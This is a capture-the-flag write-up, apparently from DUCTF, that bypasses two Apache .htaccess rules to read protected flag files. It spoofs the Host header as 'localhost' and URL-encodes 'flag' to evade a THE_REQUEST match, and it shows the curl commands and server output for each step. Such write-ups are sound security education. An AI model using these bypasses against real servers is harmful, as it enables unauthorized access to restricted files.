The site tells us that there are .htaccess files that configure the
permissions for /one/flag.txt and /two/flag.txt.  
The .htaccess file for /one/flag.txt looks like this:  
```  
RewriteEngine On  
RewriteCond %{HTTP_HOST} !^localhost$  
RewriteRule ".*" "-" [F]  
```  
That tells us if the Host header does not match the string 'localhost' the
request is rewritten to be forbidden. Luckily we can simply set the Host
header in our request to a value of our choice. Why not use 'localhost' then:

```bash  
$curl -i -s -k -X $'GET' -H $'Host: localhost'
$'http://34.87.217.252:30026/one/flag.txt'  
HTTP/1.1 200 OK  
Date: Sat, 24 Sep 2022 04:20:69 GMT  
Server: Apache/2.4.54 (Unix)  
Last-Modified: Tue, 20 Sep 2022 12:48:21 GMT  
ETag: "f-5e91b3e3b0f40"  
Accept-Ranges: bytes  
Content-Length: 15  
Content-Type: text/plain

DUCTF{thats_it_  
```  
First part of the flag down. Let's examine the second .htaccess file:  
```  
RewriteEngine On  
RewriteCond %{THE_REQUEST} flag  
RewriteRule ".*" "-" [F]  
```  
This has a similar structure but contains a server variable: 'THE_REQUEST'.  
Official apache documentation
(https://httpd.apache.org/docs/current/mod/mod_rewrite.html) states:  
```  
THE_REQUEST  
The full HTTP request line sent by the browser to the server (e.g., "GET
/index.html HTTP/1.1"). This does not include any additional headers sent by
the browser. This value has not been unescaped (decoded), unlike most other
variables below.  
```  
This means we are not allowed to request anything that has the string 'flag'
in it. Thus we simply replace the 'flag' part of the url by an URL encoded
string  
```  
$curl http://34.87.217.252:30026/two/%66lag.txt  
next_time_im_using_nginx}  
```  
Now we only have to combine the two parts of the flag to receive our points.